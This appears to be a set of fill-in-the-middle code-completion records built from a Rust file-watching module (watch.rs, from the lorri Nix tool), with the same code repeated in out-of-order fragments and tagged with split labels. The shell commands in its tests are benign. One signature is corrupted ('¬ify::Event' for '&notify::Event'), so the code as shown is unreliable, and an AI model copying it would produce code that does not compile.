sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn trivial_watch_specific_file() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap();
macos_eat_late_notifications(&mut watcher);
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn rename_over_vim() {
// Vim renames files in to place for atomic writes
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap();
macos_eat_late_notifications(&mut watcher);
// bar is not watched, expect error
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
// Do it a second time
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn walk_path_topo_filetree() -> std::io::Result<()> {
let temp = tempdir().unwrap();
let files = vec![("a", "b"), ("a", "c"), ("a/d", "e"), ("x/y", "z")];
for (dir, file) in files {
std::fs::create_dir_all(temp.path().join(dir))?;
std::fs::write(temp.path().join(dir).join(file), [])?;
}
let res = super::walk_path_topo(temp.path().to_owned())?;
// check that the list is topolocially sorted
// by making sure *no* later path is a prefix of a previous path.
let mut inv = res.clone();
inv.reverse();
for i in 0..inv.len() {
for predecessor in inv.iter().skip(i + 1) {
assert!(
!predecessor.starts_with(&inv[i]),
"{:?} is a prefix of {:?}, even though it comes later in list, thus topological order is not given!\nFull list: {:#?}",
inv[i], predecessor, res
)
}
}
// make sure the resulting list contains the same
// paths as the original list.
let mut res2 = res.clone();
res2.sort();
let mut all_paths = vec![
// our given path first
"", "a", // direct files come before nested directories
"a/b", "a/c", "x", "a/d", "a/d/e", "x/y", "x/y/z",
]
.iter()
.map(|p| temp.path().join(p).to_owned())
.collect::<Vec<_>>();
all_paths.sort();
assert_eq!(res2, all_paths);
Ok(())
}
#[test]
fn extend_filter() {
| let nix = PathBuf::from("/nix/store/njlavpa90laywf22b1myif5101qhln8r-hello-2.10");
match super::Watch::extend_filter(nix.clone()) {
Ok(path) => assert!(false, "{:?} should be filtered!", path),
Err(super::FilteredOut { path, reason }) => {
drop(reason);
assert_eq!(path, nix)
}
}
let other = PathBuf::from("/home/foo/project/foobar.nix");
assert_eq!(super::Watch::extend_filter(other.clone()), Ok(other));
}
}
| identifier_body |
|
watch.rs | //! Recursively watch paths for changes, in an extensible and
//! cross-platform way.
use crate::NixFile;
use crossbeam_channel as chan;
use notify::event::ModifyKind;
use notify::{EventKind, RecommendedWatcher, RecursiveMode, Watcher};
use slog_scope::{debug, info};
use std::collections::HashSet;
use std::path::{Path, PathBuf};
use std::time::Duration;
/// A dynamic list of paths to watch for changes, and
/// react to changes when they occur.
pub struct Watch {
/// Event receiver. Process using `Watch::process`.
pub rx: chan::Receiver<notify::Result<notify::Event>>,
notify: RecommendedWatcher,
watches: HashSet<PathBuf>,
}
/// A debug message string that can only be displayed via `Debug`.
#[derive(Clone, Debug, Serialize)]
pub struct DebugMessage(pub String);
#[derive(Debug, PartialEq, Eq)]
struct FilteredOut<'a> {
reason: &'a str,
path: PathBuf,
}
/// Description of the project change that triggered a build.
#[derive(Clone, Debug, Serialize)]
#[serde(rename_all = "snake_case")]
pub enum Reason {
/// When a project is presented to Lorri to track, it's built for this reason.
ProjectAdded(NixFile),
/// When a ping is received.
PingReceived,
/// When there is a filesystem change, the first changed file is recorded,
/// along with a count of other filesystem events.
FilesChanged(Vec<PathBuf>),
/// When the underlying notifier reports something strange.
UnknownEvent(DebugMessage),
}
/// We weren’t able to understand a `notify::Event`.
#[derive(Clone, Debug)]
pub enum EventError {
/// No message was received from the raw event channel
RxNoEventReceived,
/// The changed file event had no file path
EventHasNoFilePath(notify::Event),
}
impl Watch {
/// Instantiate a new Watch.
pub fn try_new() -> Result<Watch, notify::Error> {
let (tx, rx) = chan::unbounded();
Ok(Watch {
notify: Watcher::new(tx, Duration::from_millis(100))?,
watches: HashSet::new(),
rx,
})
}
/// Process `notify::Event`s coming in via `Watch::rx`.
///
/// `None` if there were no relevant changes.
pub fn process(
&self,
event: notify::Result<notify::Event>,
) -> Option<Result<Reason, EventError>> {
match event {
Err(err) => panic!("notify error: {}", err),
Ok(event) => {
self.log_event(&event);
if event.paths.is_empty() {
Some(Err(EventError::EventHasNoFilePath(event)))
} else {
let notify::Event { paths, kind, .. } = event;
let interesting_paths: Vec<PathBuf> = paths
.into_iter()
.filter(|p| self.path_is_interesting(p, &kind))
.collect();
if !interesting_paths.is_empty() {
Some(Ok(Reason::FilesChanged(interesting_paths)))
} else {
None
}
}
}
}
}
/// Extend the watch list with an additional list of paths.
/// Note: Watch maintains a list of already watched paths, and
/// will not add duplicates.
pub fn extend(&mut self, paths: Vec<PathBuf>) -> Result<(), notify::Error> {
for path in paths {
let recursive_paths = walk_path_topo(path)?;
for p in recursive_paths {
let p = p.canonicalize()?;
match Self::extend_filter(p) {
Err(FilteredOut { reason, path }) => {
debug!("Skipping watching {}: {}", path.display(), reason)
}
Ok(p) => {
self.add_path(p)?;
}
}
}
}
Ok(())
}
fn extend_filter(path: PathBuf) -> Result<PathBuf, FilteredOut<'static>> {
if path.starts_with(Path::new("/nix/store")) {
Err(FilteredOut {
path,
reason: "starts with /nix/store",
})
} else {
Ok(path)
}
}
fn log_event(&self, event: ¬ify::Event) {
debug!("Watch Event: {:#?}", event);
match &event.kind {
notify::event::EventKind::Remove(_) if !event.paths.is_empty() => {
info!("identified removal: {:?}", &event.paths);
}
_ => {
debug!("watch event"; "event" => ?event);
}
}
}
fn add_path(&mut self, path: PathBuf) -> Result<(), notify::Error> {
if !self.watches.contains(&path) {
debug!("watching path"; "path" => path.to_str());
self.notify.watch(&path, RecursiveMode::NonRecursive)?;
self.watches.insert(path.clone());
}
if let Some(parent) = path.parent() {
if !self.watches.contains(parent) {
debug!("watching parent path"; "parent_path" => parent.to_str());
self.notify.watch(&parent, RecursiveMode::NonRecursive)?;
}
}
Ok(())
}
fn path_is_interesting(&self, path: &PathBuf, kind: &EventKind) -> bool {
path_match(&self.watches, path)
&& match kind {
// We ignore metadata modification events for the profiles directory
// tree as it is a symlink forest that is used to keep track of
// channels and nix will uconditionally update the metadata of each
// link in this forest. See https://github.com/NixOS/nix/blob/629b9b0049363e091b76b7f60a8357d9f94733cc/src/libstore/local-store.cc#L74-L80
// for the unconditional update. These metadata modification events are
// spurious annd they can easily cause a rebuild-loop when a shell.nix
// file does not pin its version of nixpkgs or other channels. When
// a Nix channel is updated we receive many other types of events, so
// ignoring these metadata modifications will not impact lorri's
// ability to correctly watch for channel changes.
EventKind::Modify(ModifyKind::Metadata(_)) => {
if path.starts_with(Path::new("/nix/var/nix/profiles/per-user")) {
debug!("ignoring spurious metadata change event within the profiles dir"; "path" => path.to_str());
false
} else {
true
}
}
_ => true,
}
}
}
/// Lists the dirs and files in a directory, as two vectors.
/// Given path must be a readable directory.
fn list_dir(dir: &Path) -> Result<(Vec<PathBuf>, Vec<PathBuf>), std::io::Error> {
let mut dirs = vec![];
let mut files = vec![];
for entry in std::fs::read_dir(dir)? {
let entry = entry?;
if entry.file_type()?.is_dir() {
dirs.push(entry.path())
} else {
files.push(entry.path())
}
}
Ok((dirs, files))
}
/// List all children of the given path.
/// Recurses into directories.
///
/// Returns the given path first, then a topologically sorted list of children, if any.
///
/// All files have to be readable, or the function aborts.
/// TODO: gracefully skip unreadable files.
fn walk_path_topo(path: PathBuf) -> Result<Vec<PathBuf>, std::io::Error> {
// push our own path first
let mut res = vec![path.clone()];
// nothing to list
if !path.is_dir() {
return Ok(res);
}
let (dirs, mut files) = list_dir(&path)?;
// plain files
res.append(&mut files);
// now to go through the list, appending new
// directories to the work queue as you find them.
let mut work = std::collections::VecDeque::from(dirs);
loop {
match work.pop_front() {
// no directories remaining
None => break,
Some(dir) => {
res.push(dir.clone());
let (dirs, mut files) = list_dir(&dir)?;
res.append(&mut files);
work.append(&mut std::collections::VecDeque::from(dirs));
}
}
}
Ok(res)
}
/// Determine if the event path is covered by our list of watched
/// paths.
///
/// Returns true if:
/// - the event's path directly names a path in our
/// watch list
/// - the event's path names a canonicalized path in our watch list
/// - the event's path's parent directly names a path in our watch
/// list
/// - the event's path's parent names a canonicalized path in our
/// watch list
fn path_match(watched_paths: &HashSet<PathBuf>, event_path: &Path) -> bool {
let event_parent = event_path.parent();
let matches = |watched: &Path| {
if event_path == watched {
debug!(
"event path directly matches watched path";
"event_path" => event_path.to_str());
return true;
}
if let Some(parent) = event_parent {
| false
};
watched_paths.iter().any(|watched| {
if matches(watched) {
return true;
}
if let Ok(canonicalized_watch) = watched.canonicalize() {
if matches(&canonicalized_watch) {
return true;
}
}
false
})
}
#[cfg(test)]
mod tests {
use super::{EventError, Reason, Watch};
use crate::bash::expect_bash;
use std::path::PathBuf;
use std::thread::sleep;
use std::time::Duration;
use tempfile::tempdir;
/// upper bound of watcher (if it’s hit, something is broken)
fn upper_watcher_timeout() -> Duration {
// CI machines are very slow sometimes.
Duration::from_millis(1000)
}
/// Collect all notifications
fn process_all(watch: &Watch) -> Vec<Option<Result<Reason, EventError>>> {
watch.rx.try_iter().map(|e| watch.process(e)).collect()
}
/// Returns true iff the given file has changed
fn file_changed(watch: &Watch, file_name: &str) -> (bool, Vec<Reason>) {
let mut reasons = Vec::new();
let mut changed = false;
for event in process_all(watch) {
if let Some(Ok(reason)) = event {
reasons.push(reason.clone());
if let Reason::FilesChanged(files) = reason {
changed = changed
|| files
.iter()
.map(|p| p.file_name())
.filter(|f| f.is_some())
.map(|f| f.unwrap())
.any(|f| f == file_name)
}
}
}
(changed, reasons)
}
fn assert_file_changed(watch: &Watch, file_name: &str) {
let (file_changed, events) = file_changed(watch, file_name);
assert!(
file_changed,
"no file change notification for '{}'; these events occurred instead: {:?}",
file_name, events
);
}
/// Returns true iff there were no changes
fn no_changes(watch: &Watch) -> bool {
process_all(watch).iter().filter(|e| e.is_some()).count() == 0
}
#[cfg(target_os = "macos")]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// Sometimes a brand new watch will send a CREATE notification
// for a file which was just created, even if the watch was
// created after the file was made.
//
// Our tests want to be very precise about which events are
// received when, so expect these initial events and swallow
// them.
//
// Note, this is racey in the kernel. Otherwise I'd assert
// this is empty.
sleep(upper_watcher_timeout());
process_all(watcher).is_empty();
}
#[cfg(not(target_os = "macos"))]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// If we're supposedly dealing with a late notification on
// macOS, we'd better not receive any messages on other
// platforms.
//
// If we do receive any notifications, our test is broken.
sleep(upper_watcher_timeout());
assert!(process_all(watcher).is_empty());
}
#[test]
fn trivial_watch_whole_directory() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().to_path_buf()]).unwrap();
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn trivial_watch_specific_file() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap();
macos_eat_late_notifications(&mut watcher);
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn rename_over_vim() {
// Vim renames files in to place for atomic writes
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap();
macos_eat_late_notifications(&mut watcher);
// bar is not watched, expect error
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
// Do it a second time
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn walk_path_topo_filetree() -> std::io::Result<()> {
let temp = tempdir().unwrap();
let files = vec![("a", "b"), ("a", "c"), ("a/d", "e"), ("x/y", "z")];
for (dir, file) in files {
std::fs::create_dir_all(temp.path().join(dir))?;
std::fs::write(temp.path().join(dir).join(file), [])?;
}
let res = super::walk_path_topo(temp.path().to_owned())?;
// check that the list is topolocially sorted
// by making sure *no* later path is a prefix of a previous path.
let mut inv = res.clone();
inv.reverse();
for i in 0..inv.len() {
for predecessor in inv.iter().skip(i + 1) {
assert!(
!predecessor.starts_with(&inv[i]),
"{:?} is a prefix of {:?}, even though it comes later in list, thus topological order is not given!\nFull list: {:#?}",
inv[i], predecessor, res
)
}
}
// make sure the resulting list contains the same
// paths as the original list.
let mut res2 = res.clone();
res2.sort();
let mut all_paths = vec![
// our given path first
"", "a", // direct files come before nested directories
"a/b", "a/c", "x", "a/d", "a/d/e", "x/y", "x/y/z",
]
.iter()
.map(|p| temp.path().join(p).to_owned())
.collect::<Vec<_>>();
all_paths.sort();
assert_eq!(res2, all_paths);
Ok(())
}
#[test]
fn extend_filter() {
let nix = PathBuf::from("/nix/store/njlavpa90laywf22b1myif5101qhln8r-hello-2.10");
match super::Watch::extend_filter(nix.clone()) {
Ok(path) => assert!(false, "{:?} should be filtered!", path),
Err(super::FilteredOut { path, reason }) => {
drop(reason);
assert_eq!(path, nix)
}
}
let other = PathBuf::from("/home/foo/project/foobar.nix");
assert_eq!(super::Watch::extend_filter(other.clone()), Ok(other));
}
}
| if parent == watched {
debug!(
"event path parent matches watched path";
"event_path" => event_path.to_str(), "parent_path" => parent.to_str());
return true;
}
}
| conditional_block |
watch.rs | //! Recursively watch paths for changes, in an extensible and
//! cross-platform way.
use crate::NixFile;
use crossbeam_channel as chan;
use notify::event::ModifyKind;
use notify::{EventKind, RecommendedWatcher, RecursiveMode, Watcher};
use slog_scope::{debug, info};
use std::collections::HashSet;
use std::path::{Path, PathBuf};
use std::time::Duration;
/// A dynamic list of paths to watch for changes, and
/// react to changes when they occur.
pub struct Watch {
/// Event receiver. Process using `Watch::process`.
pub rx: chan::Receiver<notify::Result<notify::Event>>,
notify: RecommendedWatcher,
watches: HashSet<PathBuf>,
}
/// A debug message string that can only be displayed via `Debug`.
#[derive(Clone, Debug, Serialize)]
pub struct DebugMessage(pub String);
#[derive(Debug, PartialEq, Eq)]
struct FilteredOut<'a> {
reason: &'a str,
path: PathBuf,
}
/// Description of the project change that triggered a build.
#[derive(Clone, Debug, Serialize)]
#[serde(rename_all = "snake_case")]
pub enum Reason {
/// When a project is presented to Lorri to track, it's built for this reason.
ProjectAdded(NixFile),
/// When a ping is received.
PingReceived,
/// When there is a filesystem change, the first changed file is recorded,
/// along with a count of other filesystem events.
FilesChanged(Vec<PathBuf>),
/// When the underlying notifier reports something strange.
UnknownEvent(DebugMessage),
}
/// We weren’t able to understand a `notify::Event`.
#[derive(Clone, Debug)]
pub enum EventError {
/// No message was received from the raw event channel
RxNoEventReceived,
/// The changed file event had no file path
EventHasNoFilePath(notify::Event),
}
impl Watch {
/// Instantiate a new Watch.
pub fn try_new() -> Result<Watch, notify::Error> {
let (tx, rx) = chan::unbounded();
Ok(Watch {
notify: Watcher::new(tx, Duration::from_millis(100))?,
watches: HashSet::new(),
rx,
})
}
/// Process `notify::Event`s coming in via `Watch::rx`.
///
/// `None` if there were no relevant changes.
pub fn process(
&self,
event: notify::Result<notify::Event>,
) -> Option<Result<Reason, EventError>> {
match event {
Err(err) => panic!("notify error: {}", err),
Ok(event) => {
self.log_event(&event);
if event.paths.is_empty() {
Some(Err(EventError::EventHasNoFilePath(event)))
} else {
let notify::Event { paths, kind, .. } = event;
let interesting_paths: Vec<PathBuf> = paths
.into_iter()
.filter(|p| self.path_is_interesting(p, &kind))
.collect();
if !interesting_paths.is_empty() {
Some(Ok(Reason::FilesChanged(interesting_paths)))
} else {
None
}
}
}
}
}
/// Extend the watch list with an additional list of paths.
/// Note: Watch maintains a list of already watched paths, and
/// will not add duplicates.
pub fn extend(&mut self, paths: Vec<PathBuf>) -> Result<(), notify::Error> {
for path in paths {
let recursive_paths = walk_path_topo(path)?;
for p in recursive_paths {
let p = p.canonicalize()?;
match Self::extend_filter(p) {
Err(FilteredOut { reason, path }) => {
debug!("Skipping watching {}: {}", path.display(), reason)
}
Ok(p) => {
self.add_path(p)?;
}
}
}
}
Ok(())
}
fn extend_filter(path: PathBuf) -> Result<PathBuf, FilteredOut<'static>> {
if path.starts_with(Path::new("/nix/store")) {
Err(FilteredOut {
path,
reason: "starts with /nix/store",
})
} else {
Ok(path)
}
}
fn log_event(&self, event: ¬ify::Event) {
debug!("Watch Event: {:#?}", event);
match &event.kind {
notify::event::EventKind::Remove(_) if !event.paths.is_empty() => {
info!("identified removal: {:?}", &event.paths);
}
_ => {
debug!("watch event"; "event" => ?event);
}
}
}
fn add_path(&mut self, path: PathBuf) -> Result<(), notify::Error> {
if !self.watches.contains(&path) {
debug!("watching path"; "path" => path.to_str());
self.notify.watch(&path, RecursiveMode::NonRecursive)?;
self.watches.insert(path.clone());
}
if let Some(parent) = path.parent() {
if !self.watches.contains(parent) {
debug!("watching parent path"; "parent_path" => parent.to_str());
self.notify.watch(&parent, RecursiveMode::NonRecursive)?;
}
}
Ok(())
}
fn path_is_interesting(&self, path: &PathBuf, kind: &EventKind) -> bool {
path_match(&self.watches, path)
&& match kind {
// We ignore metadata modification events for the profiles directory
// tree as it is a symlink forest that is used to keep track of
// channels and nix will uconditionally update the metadata of each
// link in this forest. See https://github.com/NixOS/nix/blob/629b9b0049363e091b76b7f60a8357d9f94733cc/src/libstore/local-store.cc#L74-L80
// for the unconditional update. These metadata modification events are
// spurious annd they can easily cause a rebuild-loop when a shell.nix
// file does not pin its version of nixpkgs or other channels. When
// a Nix channel is updated we receive many other types of events, so
// ignoring these metadata modifications will not impact lorri's
// ability to correctly watch for channel changes.
EventKind::Modify(ModifyKind::Metadata(_)) => {
if path.starts_with(Path::new("/nix/var/nix/profiles/per-user")) {
debug!("ignoring spurious metadata change event within the profiles dir"; "path" => path.to_str());
false
} else {
true
}
}
_ => true,
}
}
}
/// Lists the dirs and files in a directory, as two vectors.
/// Given path must be a readable directory.
fn list_dir(dir: &Path) -> Result<(Vec<PathBuf>, Vec<PathBuf>), std::io::Error> {
let mut dirs = vec![];
let mut files = vec![];
for entry in std::fs::read_dir(dir)? {
let entry = entry?;
if entry.file_type()?.is_dir() {
dirs.push(entry.path())
} else {
files.push(entry.path())
}
}
Ok((dirs, files))
}
/// List all children of the given path.
/// Recurses into directories.
///
/// Returns the given path first, then a topologically sorted list of children, if any.
///
/// All files have to be readable, or the function aborts.
/// TODO: gracefully skip unreadable files.
fn walk_path_topo(path: PathBuf) -> Result<Vec<PathBuf>, std::io::Error> {
// push our own path first
let mut res = vec![path.clone()];
// nothing to list
if !path.is_dir() {
return Ok(res);
}
let (dirs, mut files) = list_dir(&path)?;
// plain files
res.append(&mut files);
// now to go through the list, appending new
// directories to the work queue as you find them.
let mut work = std::collections::VecDeque::from(dirs);
loop {
match work.pop_front() {
// no directories remaining
None => break,
Some(dir) => {
res.push(dir.clone());
let (dirs, mut files) = list_dir(&dir)?;
res.append(&mut files);
work.append(&mut std::collections::VecDeque::from(dirs));
}
}
}
Ok(res)
}
/// Determine if the event path is covered by our list of watched
/// paths.
///
/// Returns true if:
/// - the event's path directly names a path in our
/// watch list
/// - the event's path names a canonicalized path in our watch list
/// - the event's path's parent directly names a path in our watch
/// list
/// - the event's path's parent names a canonicalized path in our
/// watch list
fn path_match(watched_paths: &HashSet<PathBuf>, event_path: &Path) -> bool {
let event_parent = event_path.parent();
let matches = |watched: &Path| {
if event_path == watched {
debug!(
"event path directly matches watched path";
"event_path" => event_path.to_str());
return true;
}
if let Some(parent) = event_parent {
if parent == watched {
debug!(
"event path parent matches watched path";
"event_path" => event_path.to_str(), "parent_path" => parent.to_str());
return true;
}
}
false
};
watched_paths.iter().any(|watched| {
if matches(watched) {
return true;
}
if let Ok(canonicalized_watch) = watched.canonicalize() {
if matches(&canonicalized_watch) {
return true;
}
}
false
})
}
#[cfg(test)]
mod tests {
use super::{EventError, Reason, Watch};
use crate::bash::expect_bash;
use std::path::PathBuf;
use std::thread::sleep;
use std::time::Duration;
use tempfile::tempdir;
/// upper bound of watcher (if it’s hit, something is broken)
fn upper_watcher_timeout() -> Duration {
// CI machines are very slow sometimes.
Duration::from_millis(1000)
}
/// Collect all notifications
fn process_all(watch: &Watch) -> Vec<Option<Result<Reason, EventError>>> {
watch.rx.try_iter().map(|e| watch.process(e)).collect()
}
/// Returns true iff the given file has changed
fn file_changed(watch: &Watch, file_name: &str) -> (bool, Vec<Reason>) {
let mut reasons = Vec::new();
let mut changed = false;
for event in process_all(watch) {
if let Some(Ok(reason)) = event {
reasons.push(reason.clone());
if let Reason::FilesChanged(files) = reason {
changed = changed
|| files
.iter()
.map(|p| p.file_name())
.filter(|f| f.is_some())
.map(|f| f.unwrap())
.any(|f| f == file_name)
}
}
}
(changed, reasons)
}
fn assert_file_changed(watch: &Watch, file_name: &str) {
let (file_changed, events) = file_changed(watch, file_name);
assert!(
file_changed,
"no file change notification for '{}'; these events occurred instead: {:?}",
file_name, events
);
}
/// Returns true iff there were no changes
fn no_changes(watch: &Watch) -> bool {
process_all(watch).iter().filter(|e| e.is_some()).count() == 0
}
#[cfg(target_os = "macos")]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// Sometimes a brand new watch will send a CREATE notification
// for a file which was just created, even if the watch was
// created after the file was made.
//
// Our tests want to be very precise about which events are
// received when, so expect these initial events and swallow
// them.
//
// Note, this is racey in the kernel. Otherwise I'd assert
// this is empty.
sleep(upper_watcher_timeout());
process_all(watcher).is_empty();
}
#[cfg(not(target_os = "macos"))]
fn macos_eat_late_notifications(watcher: &mut Watch) {
// If we're supposedly dealing with a late notification on
// macOS, we'd better not receive any messages on other
// platforms.
//
// If we do receive any notifications, our test is broken.
sleep(upper_watcher_timeout());
assert!(process_all(watcher).is_empty());
}
#[test]
fn trivial_watch_whole_directory() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().to_path_buf()]).unwrap();
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn trivial_watch_specific_file() {
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap();
macos_eat_late_notifications(&mut watcher);
expect_bash(r#"echo 1 > "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn rename_over_vim() {
// Vim renames files in to place for atomic writes
let mut watcher = Watch::try_new().expect("failed creating Watch");
let temp = tempdir().unwrap();
expect_bash(r#"mkdir -p "$1""#, &[temp.path().as_os_str()]);
expect_bash(r#"touch "$1/foo""#, &[temp.path().as_os_str()]);
watcher.extend(vec![temp.path().join("foo")]).unwrap(); | macos_eat_late_notifications(&mut watcher);
// bar is not watched, expect error
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
// Do it a second time
expect_bash(r#"echo 1 > "$1/bar""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert!(no_changes(&watcher));
// Rename bar to foo, expect a notification
expect_bash(r#"mv "$1/bar" "$1/foo""#, &[temp.path().as_os_str()]);
sleep(upper_watcher_timeout());
assert_file_changed(&watcher, "foo");
}
#[test]
fn walk_path_topo_filetree() -> std::io::Result<()> {
let temp = tempdir().unwrap();
let files = vec![("a", "b"), ("a", "c"), ("a/d", "e"), ("x/y", "z")];
for (dir, file) in files {
std::fs::create_dir_all(temp.path().join(dir))?;
std::fs::write(temp.path().join(dir).join(file), [])?;
}
let res = super::walk_path_topo(temp.path().to_owned())?;
// check that the list is topolocially sorted
// by making sure *no* later path is a prefix of a previous path.
let mut inv = res.clone();
inv.reverse();
for i in 0..inv.len() {
for predecessor in inv.iter().skip(i + 1) {
assert!(
!predecessor.starts_with(&inv[i]),
"{:?} is a prefix of {:?}, even though it comes later in list, thus topological order is not given!\nFull list: {:#?}",
inv[i], predecessor, res
)
}
}
// make sure the resulting list contains the same
// paths as the original list.
let mut res2 = res.clone();
res2.sort();
let mut all_paths = vec![
// our given path first
"", "a", // direct files come before nested directories
"a/b", "a/c", "x", "a/d", "a/d/e", "x/y", "x/y/z",
]
.iter()
.map(|p| temp.path().join(p).to_owned())
.collect::<Vec<_>>();
all_paths.sort();
assert_eq!(res2, all_paths);
Ok(())
}
#[test]
fn extend_filter() {
let nix = PathBuf::from("/nix/store/njlavpa90laywf22b1myif5101qhln8r-hello-2.10");
match super::Watch::extend_filter(nix.clone()) {
Ok(path) => assert!(false, "{:?} should be filtered!", path),
Err(super::FilteredOut { path, reason }) => {
drop(reason);
assert_eq!(path, nix)
}
}
let other = PathBuf::from("/home/foo/project/foobar.nix");
assert_eq!(super::Watch::extend_filter(other.clone()), Ok(other));
}
} | random_line_split |
|
watch.rs | //! Recursively watch paths for changes, in an extensible and
//! cross-platform way.
use crate::NixFile;
use crossbeam_channel as chan;
use notify::event::ModifyKind;
use notify::{EventKind, RecommendedWatcher, RecursiveMode, Watcher};
use slog_scope::{debug, info};
use std::collections::HashSet;
use std::path::{Path, PathBuf};
use std::time::Duration;
/// A dynamic list of paths to watch for changes, and
/// react to changes when they occur.
pub struct Watch {
/// Event receiver. Process using `Watch::process`.
pub rx: chan::Receiver<notify::Result<notify::Event>>,
notify: RecommendedWatcher,
watches: HashSet<PathBuf>,
}
/// A debug message string that can only be displayed via `Debug`.
#[derive(Clone, Debug, Serialize)]
pub struct DebugMessage(pub String);
#[derive(Debug, PartialEq, Eq)]
struct FilteredOut<'a> {
reason: &'a str,
path: PathBuf,
}
/// Description of the project change that triggered a build.
#[derive(Clone, Debug, Serialize)]
#[serde(rename_all = "snake_case")]
pub enum Reason {
/// When a project is presented to Lorri to track, it's built for this reason.
ProjectAdded(NixFile),
/// When a ping is received.
PingReceived,
/// When there is a filesystem change, the first changed file is recorded,
/// along with a count of other filesystem events.
FilesChanged(Vec<PathBuf>),
/// When the underlying notifier reports something strange.
UnknownEvent(DebugMessage),
}
/// We weren’t able to understand a `notify::Event`.
#[derive(Clone, Debug)]
pub enum EventError {
/// No message was received from the raw event channel
RxNoEventReceived,
/// The changed file event had no file path
EventHasNoFilePath(notify::Event),
}
impl Watch {
/// Instantiate a new Watch.
pub fn try_new() -> Result<Watch, notify::Error> {
let (tx, rx) = chan::unbounded();
Ok(Watch {
notify: Watcher::new(tx, Duration::from_millis(100))?,
watches: HashSet::new(),
rx,
})
}
/// Process `notify::Event`s coming in via `Watch::rx`.
///
/// `None` if there were no relevant changes.
pub fn process(
&self,
event: notify::Result<notify::Event>,
) -> Option<Result<Reason, EventError>> {
match event {
Err(err) => panic!("notify error: {}", err),
Ok(event) => {
self.log_event(&event);
if event.paths.is_empty() {
Some(Err(EventError::EventHasNoFilePath(event)))
} else {
let notify::Event { paths, kind, .. } = event;
let interesting_paths: Vec<PathBuf> = paths
.into_iter()
.filter(|p| self.path_is_interesting(p, &kind))
.collect();
if !interesting_paths.is_empty() {
Some(Ok(Reason::FilesChanged(interesting_paths)))
} else {
None
}
}
}
}
}
/// Extend the watch list with an additional list of paths.
